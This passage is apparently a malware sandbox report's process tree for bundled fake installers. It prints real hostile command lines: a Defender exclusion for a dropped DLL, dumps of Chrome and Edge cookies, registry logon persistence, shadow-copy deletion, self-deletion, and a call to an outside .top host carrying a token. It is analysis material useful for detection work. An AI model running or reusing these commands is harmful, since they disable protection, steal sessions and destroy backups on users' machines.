                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\is-4JPHF.tmp\7FNp3Fxr0hDf5acCyNVi4GVq.tmp" /SL5="$401D4,138429,56832,C:\Users\Admin\Documents\7FNp3Fxr0hDf5acCyNVi4GVq.exe"
                                                                                                                                                          5⤵
                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                          • Suspicious use of FindShellTrayWindow
                                                                                                                                                          PID:8108
                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\is-HP8DQ.tmp\Setup.exe
                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\is-HP8DQ.tmp\Setup.exe" /Verysilent
                                                                                                                                                            6⤵
                                                                                                                                                              PID:9100
                                                                                                                                                              • C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe
                                                                                                                                                                "C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" /qn CAMPAIGN="710"
                                                                                                                                                                7⤵
                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                • Enumerates connected drives
                                                                                                                                                                • Modifies system certificate store
                                                                                                                                                                PID:6748
                                                                                                                                                                • C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                  "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=710 AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629579442 /qn CAMPAIGN=""710"" " CAMPAIGN="710"
                                                                                                                                                                  8⤵
                                                                                                                                                                    PID:9580
                                                                                                                                                          • C:\Users\Admin\Documents\p6DDbuhrtjpm1QrRCtM2_t0w.exe
                                                                                                                                                            "C:\Users\Admin\Documents\p6DDbuhrtjpm1QrRCtM2_t0w.exe"
                                                                                                                                                            4⤵
                                                                                                                                                              PID:8004
                                                                                                                                                              • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                C:\Windows\system32\rundll32.exe C:\Users\Admin\DOCUME~1\P6DDBU~1.DLL,s C:\Users\Admin\DOCUME~1\P6DDBU~1.EXE
                                                                                                                                                                5⤵
                                                                                                                                                                • Blocklisted process makes network request
                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                PID:10228
                                                                                                                                                                • C:\Windows\SysWOW64\RUNDLL32.EXE
                                                                                                                                                                  C:\Windows\system32\RUNDLL32.EXE C:\Users\Admin\DOCUME~1\P6DDBU~1.DLL,KykCZg==
                                                                                                                                                                  6⤵
                                                                                                                                                                  • Blocklisted process makes network request
                                                                                                                                                                  • Checks processor information in registry
                                                                                                                                                                  • Modifies system certificate store
                                                                                                                                                                  PID:9312
                                                                                                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath C:\Users\Admin\DOCUME~1\P6DDBU~1.DLL
                                                                                                                                                                    7⤵
                                                                                                                                                                      PID:7600
                                                                                                                                                                      • C:\Windows\System32\Conhost.exe
                                                                                                                                                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                        8⤵
                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                                        • Enumerates connected drives
                                                                                                                                                                        • Suspicious use of FindShellTrayWindow
                                                                                                                                                                        PID:6016
                                                                                                                                                                    • C:\Windows\SysWOW64\RUNDLL32.EXE
                                                                                                                                                                      C:\Windows\system32\RUNDLL32.EXE C:\Users\Admin\DOCUME~1\P6DDBU~1.DLL,gko3dzRY
                                                                                                                                                                      7⤵
                                                                                                                                                                      • Suspicious use of SetThreadContext
                                                                                                                                                                      • Checks processor information in registry
                                                                                                                                                                      PID:8872
                                                                                                                                                                      • C:\Windows\system32\rundll32.exe
                                                                                                                                                                        C:\Windows\system32\rundll32.exe C:\Windows\system32\shell32.dll,#61 31804
                                                                                                                                                                        8⤵
                                                                                                                                                                        • Modifies Internet Explorer settings
                                                                                                                                                                        PID:10236
                                                                                                                                                                        • C:\Windows\system32\ctfmon.exe
                                                                                                                                                                          ctfmon.exe
                                                                                                                                                                          9⤵
                                                                                                                                                                            PID:3164
                                                                                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Executionpolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\tmpE6AF.tmp.ps1"
                                                                                                                                                                        7⤵
                                                                                                                                                                          PID:4604
                                                                                                                                                                  • C:\Users\Admin\Documents\sYZ2hsTHN5oi4O0iqqHbeoVC.exe
                                                                                                                                                                    "C:\Users\Admin\Documents\sYZ2hsTHN5oi4O0iqqHbeoVC.exe"
                                                                                                                                                                    4⤵
                                                                                                                                                                      PID:7748
                                                                                                                                                                      • C:\Users\Admin\Documents\sYZ2hsTHN5oi4O0iqqHbeoVC.exe
                                                                                                                                                                        "C:\Users\Admin\Documents\sYZ2hsTHN5oi4O0iqqHbeoVC.exe" -q
                                                                                                                                                                        5⤵
                                                                                                                                                                          PID:7208
                                                                                                                                                                    • C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe
                                                                                                                                                                      "C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe" /Verysilent
                                                                                                                                                                      3⤵
                                                                                                                                                                        PID:6060
                                                                                                                                                                      • C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe
                                                                                                                                                                        "C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe" /Verysilent
                                                                                                                                                                        3⤵
                                                                                                                                                                          PID:5952
                                                                                                                                                                        • C:\Program Files (x86)\GameBox INC\GameBox\runvd.exe
                                                                                                                                                                          "C:\Program Files (x86)\GameBox INC\GameBox\runvd.exe"
                                                                                                                                                                          3⤵
                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                                          PID:5920
                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 5920 -s 764
                                                                                                                                                                            4⤵
                                                                                                                                                                            • Program crash
                                                                                                                                                                            PID:6752
                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 5920 -s 808
                                                                                                                                                                            4⤵
                                                                                                                                                                            • Program crash
                                                                                                                                                                            PID:4272
                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 5920 -s 724
                                                                                                                                                                            4⤵
                                                                                                                                                                            • Program crash
                                                                                                                                                                            PID:7764
                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 5920 -s 824
                                                                                                                                                                            4⤵
                                                                                                                                                                            • Program crash
                                                                                                                                                                            PID:7140
                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 5920 -s 952
                                                                                                                                                                            4⤵
                                                                                                                                                                            • Program crash
                                                                                                                                                                            PID:4868
                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 5920 -s 988
                                                                                                                                                                            4⤵
                                                                                                                                                                            • Program crash
                                                                                                                                                                            PID:6692
                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 5920 -s 940
                                                                                                                                                                            4⤵
                                                                                                                                                                            • Program crash
                                                                                                                                                                            PID:5772
                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 5920 -s 1340
                                                                                                                                                                            4⤵
                                                                                                                                                                            • Program crash
                                                                                                                                                                            PID:6768
                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 5920 -s 1388
                                                                                                                                                                            4⤵
                                                                                                                                                                            • Program crash
                                                                                                                                                                            PID:6692
                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 5920 -s 1472
                                                                                                                                                                            4⤵
                                                                                                                                                                            • Program crash
                                                                                                                                                                            PID:8588
                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 5920 -s 1516
                                                                                                                                                                            4⤵
                                                                                                                                                                            • Program crash
                                                                                                                                                                            PID:8736
                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 5920 -s 1492
                                                                                                                                                                            4⤵
                                                                                                                                                                            • Program crash
                                                                                                                                                                            PID:9084
                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 5920 -s 1636
                                                                                                                                                                            4⤵
                                                                                                                                                                            • Program crash
                                                                                                                                                                            PID:8208
                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 5920 -s 1488
                                                                                                                                                                            4⤵
                                                                                                                                                                            • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                            • Program crash
                                                                                                                                                                            PID:8476
                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                      1⤵
                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                      PID:4144
                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                      1⤵
                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                      PID:5268
                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\11111.exe /DeleteCookiesWildcard "*.facebook.com"
                                                                                                                                                                      1⤵
                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                      PID:5392
                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                      1⤵
                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                      PID:5144
                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /DeleteCookiesWildcard "*.facebook.com"
                                                                                                                                                                      1⤵
                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                      PID:5216
                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\is-9OMHT.tmp\WEATHER Manager.tmp
                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\is-9OMHT.tmp\WEATHER Manager.tmp" /SL5="$202EE,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe" /Verysilent
                                                                                                                                                                      1⤵
                                                                                                                                                                        PID:4772
                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\is-060G2.tmp\Setup.exe
                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\is-060G2.tmp\Setup.exe" /quiet SILENT=1 AF=715 BF=715
                                                                                                                                                                          2⤵
                                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                                          • Enumerates connected drives
                                                                                                                                                                          • Modifies system certificate store
                                                                                                                                                                          • Suspicious use of FindShellTrayWindow
                                                                                                                                                                          PID:7816
                                                                                                                                                                          • C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                            "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Weather\Weather 1.0.0\install\FD7DF1F\Weather Installation.msi" /quiet SILENT=1 AF=715 BF=715 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\is-060G2.tmp\Setup.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\is-060G2.tmp\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629579442 /quiet SILENT=1 AF=715 BF=715 " AF="715" AI_CONTROL_VISUAL_STYLE="16578540;16578540;14988840;12422912" BF="715"
                                                                                                                                                                            3⤵
                                                                                                                                                                              PID:8200
                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\is-77PP5.tmp\Inlog.tmp
                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\is-77PP5.tmp\Inlog.tmp" /SL5="$30302,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe" /Verysilent
                                                                                                                                                                          1⤵
                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                                          • Suspicious use of FindShellTrayWindow
                                                                                                                                                                          PID:5384
                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\is-MHRDJ.tmp\Setup.exe
                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\is-MHRDJ.tmp\Setup.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 721
                                                                                                                                                                            2⤵
                                                                                                                                                                              PID:4076
                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\is-LQSVB.tmp\Setup.tmp
                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\is-LQSVB.tmp\Setup.tmp" /SL5="$203A2,17356095,721408,C:\Users\Admin\AppData\Local\Temp\is-MHRDJ.tmp\Setup.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 721
                                                                                                                                                                                3⤵
                                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                                • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                PID:7804
                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                  "cmd.exe" /c expand C:\Users\Admin\AppData\Local\Temp\is-1636J.tmp\{app}\microsoft.cab -F:* %ProgramData%
                                                                                                                                                                                  4⤵
                                                                                                                                                                                    PID:5716
                                                                                                                                                                                    • C:\Windows\SysWOW64\expand.exe
                                                                                                                                                                                      expand C:\Users\Admin\AppData\Local\Temp\is-1636J.tmp\{app}\microsoft.cab -F:* C:\ProgramData
                                                                                                                                                                                      5⤵
                                                                                                                                                                                      • Drops file in Windows directory
                                                                                                                                                                                      PID:5228
                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                    "cmd.exe" /c reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "%ProgramData%\regid.1993-06.com.microsoft\svrwebui.exe" /f
                                                                                                                                                                                    4⤵
                                                                                                                                                                                      PID:3980
                                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                        reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe" /f
                                                                                                                                                                                        5⤵
                                                                                                                                                                                          PID:6004
                                                                                                                                                                                      • C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe
                                                                                                                                                                                        "C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe"
                                                                                                                                                                                        4⤵
                                                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                                                        PID:8840
                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\is-1636J.tmp\{app}\vdi_compiler.exe
                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\is-1636J.tmp\{app}\vdi_compiler"
                                                                                                                                                                                        4⤵
                                                                                                                                                                                          PID:5208
                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                            "C:\Windows\system32\cmd.exe" /c ping localhost -n 4 && del "C:\Users\Admin\AppData\Local\Temp\is-1636J.tmp\{app}\vdi_compiler.exe"
                                                                                                                                                                                            5⤵
                                                                                                                                                                                              PID:7412
                                                                                                                                                                                              • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                                                ping localhost -n 4
                                                                                                                                                                                                6⤵
                                                                                                                                                                                                • Runs ping.exe
                                                                                                                                                                                                PID:5580
                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                            "cmd.exe" /c start http://afleof21klg.top/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=74449^&param=721
                                                                                                                                                                                            4⤵
                                                                                                                                                                                            • Checks computer location settings
                                                                                                                                                                                            PID:8656
                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                      1⤵
                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                      PID:6120
                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /DeleteCookiesWildcard "*.facebook.com"
                                                                                                                                                                                      1⤵
                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                      PID:5516
                                                                                                                                                                                    • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                      rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                      1⤵
                                                                                                                                                                                      • Process spawned unexpected child process
                                                                                                                                                                                      PID:6048
                                                                                                                                                                                      • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                        rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                        2⤵
                                                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                                                        PID:4660
                                                                                                                                                                                    • C:\Windows\system32\msiexec.exe
                                                                                                                                                                                      C:\Windows\system32\msiexec.exe /V
                                                                                                                                                                                      1⤵
                                                                                                                                                                                      • Enumerates connected drives
                                                                                                                                                                                      • Drops file in Windows directory
                                                                                                                                                                                      PID:8168
                                                                                                                                                                                      • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                        C:\Windows\syswow64\MsiExec.exe -Embedding 07517520CD90196045123F76100E09AB C
                                                                                                                                                                                        2⤵
                                                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                                                        PID:6688
                                                                                                                                                                                      • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                        C:\Windows\syswow64\MsiExec.exe -Embedding F2BFFBB4C6DBAFDB448B636A8D434853
                                                                                                                                                                                        2⤵
                                                                                                                                                                                        • Blocklisted process makes network request
                                                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                                                        PID:8600
                                                                                                                                                                                      • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                        C:\Windows\syswow64\MsiExec.exe -Embedding 94D9276A3085C58DF8C7D927D13F40B9 C
                                                                                                                                                                                        2⤵
                                                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                                                        PID:8696
                                                                                                                                                                                      • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                        C:\Windows\syswow64\MsiExec.exe -Embedding EACF85CF5054F106C4DD9597501F7A4C C
                                                                                                                                                                                        2⤵
                                                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                                                        PID:8744
                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe
                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe"
                                                                                                                                                                                        2⤵
                                                                                                                                                                                        • Adds Run key to start application
                                                                                                                                                                                        PID:8188
                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\RequiredApplication_1\Cleaner_Installation.exe
                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\RequiredApplication_1\Cleaner_Installation.exe" -silent=1 -CID=717 -SID=717 -submn=default
                                                                                                                                                                                          3⤵
                                                                                                                                                                                          • Adds Run key to start application
                                                                                                                                                                                          PID:8876
                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" "--anbfs"
                                                                                                                                                                                            4⤵
                                                                                                                                                                                              PID:5568
                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Cleaner\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" --annotation=plat=Win64 --annotation=prod=Cleaner --annotation=ver=0.0.13 --initial-client-data=0x1dc,0x1e0,0x1e4,0x1b8,0x1e8,0x7ffde78adec0,0x7ffde78aded0,0x7ffde78adee0
                                                                                                                                                                                                5⤵
                                                                                                                                                                                                • Checks BIOS information in registry
                                                                                                                                                                                                • Checks whether UAC is enabled
                                                                                                                                                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                PID:9336
                                                                                                                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                            "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" -NonInteractive -NoLogo -ExecutionPolicy AllSigned -Command "C:\Users\Admin\AppData\Local\Temp\AI_2C15.ps1 -paths 'C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\file_deleter.ps1','C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe','C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites' -retry_count 10"
                                                                                                                                                                                            3⤵
                                                                                                                                                                                              PID:4508
                                                                                                                                                                                        • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                          rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                          1⤵
                                                                                                                                                                                          • Process spawned unexpected child process
                                                                                                                                                                                          PID:8568
                                                                                                                                                                                          • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                            rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                            2⤵
                                                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                                                            PID:8544
                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 8544 -s 624
                                                                                                                                                                                              3⤵
                                                                                                                                                                                              • Program crash
                                                                                                                                                                                              PID:8784
                                                                                                                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                                                                          1⤵
                                                                                                                                                                                          • Drops file in Windows directory
                                                                                                                                                                                          • Modifies Internet Explorer settings
                                                                                                                                                                                          • Modifies registry class
                                                                                                                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                          PID:9704
                                                                                                                                                                                        • C:\Windows\system32\browser_broker.exe
                                                                                                                                                                                          C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                                                                          1⤵
                                                                                                                                                                                          • Modifies Internet Explorer settings
                                                                                                                                                                                          PID:9904
                                                                                                                                                                                        • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                          c:\windows\system32\svchost.exe -k dcomlaunch -s DeviceInstall
                                                                                                                                                                                          1⤵
                                                                                                                                                                                          • Drops file in Windows directory
                                                                                                                                                                                          • Checks SCSI registry key(s)
                                                                                                                                                                                          PID:10140
                                                                                                                                                                                          • C:\Windows\system32\DrvInst.exe
                                                                                                                                                                                            DrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{4087ef09-20db-3c4c-b32a-eb246c3c5e34}\oemvista.inf" "9" "4d14a44ff" "0000000000000174" "WinSta0\Default" "0000000000000178" "208" "c:\program files (x86)\maskvpn\driver\win764"
                                                                                                                                                                                            2⤵
                                                                                                                                                                                            • Drops file in System32 directory
                                                                                                                                                                                            • Drops file in Windows directory
                                                                                                                                                                                            • Checks SCSI registry key(s)
                                                                                                                                                                                            • Modifies data under HKEY_USERS
                                                                                                                                                                                            PID:8860
                                                                                                                                                                                          • C:\Windows\system32\DrvInst.exe
                                                                                                                                                                                            DrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem2.inf" "oemvista.inf:3beb73aff103cc24:tap0901.ndi:9.0.0.21:tap0901," "4d14a44ff" "0000000000000174"
                                                                                                                                                                                            2⤵
                                                                                                                                                                                            • Drops file in Drivers directory
                                                                                                                                                                                            • Drops file in System32 directory
                                                                                                                                                                                            • Drops file in Windows directory
                                                                                                                                                                                            • Checks SCSI registry key(s)
                                                                                                                                                                                            PID:9392
                                                                                                                                                                                        • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                          c:\windows\system32\svchost.exe -k netsvcs -s NetSetupSvc
                                                                                                                                                                                          1⤵
                                                                                                                                                                                            PID:5684
                                                                                                                                                                                          • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                            c:\windows\system32\svchost.exe -k netsvcs -s DsmSvc
                                                                                                                                                                                            1⤵
                                                                                                                                                                                            • Checks SCSI registry key(s)
                                                                                                                                                                                            PID:7652
                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\145.exe
                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\145.exe
                                                                                                                                                                                            1⤵
                                                                                                                                                                                              PID:9684
                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\84B.exe
                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\84B.exe
                                                                                                                                                                                              1⤵
                                                                                                                                                                                              • Loads dropped DLL
                                                                                                                                                                                              PID:9232
                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\1BA5.exe
                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\1BA5.exe
                                                                                                                                                                                              1⤵
                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                              • Checks BIOS information in registry
                                                                                                                                                                                              • Checks whether UAC is enabled
                                                                                                                                                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                              PID:6060
                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\20D7.exe
                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\20D7.exe
                                                                                                                                                                                              1⤵
                                                                                                                                                                                              • Adds Run key to start application
                                                                                                                                                                                              PID:10064
                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\smss.exe
                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\smss.exe" -start
                                                                                                                                                                                                2⤵
                                                                                                                                                                                                • Enumerates connected drives
                                                                                                                                                                                                PID:9200
                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\smss.exe
                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\smss.exe" -agent 0
                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                  • Drops file in System32 directory
                                                                                                                                                                                                  • Drops file in Program Files directory
                                                                                                                                                                                                  • Drops file in Windows directory
                                                                                                                                                                                                  • Checks SCSI registry key(s)
                                                                                                                                                                                                  PID:7884
                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                  "C:\Windows\system32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\~temp001.bat
                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                    PID:8576
                                                                                                                                                                                                    • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                                                                                                                      wmic shadowcopy delete
                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                        PID:9624
                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
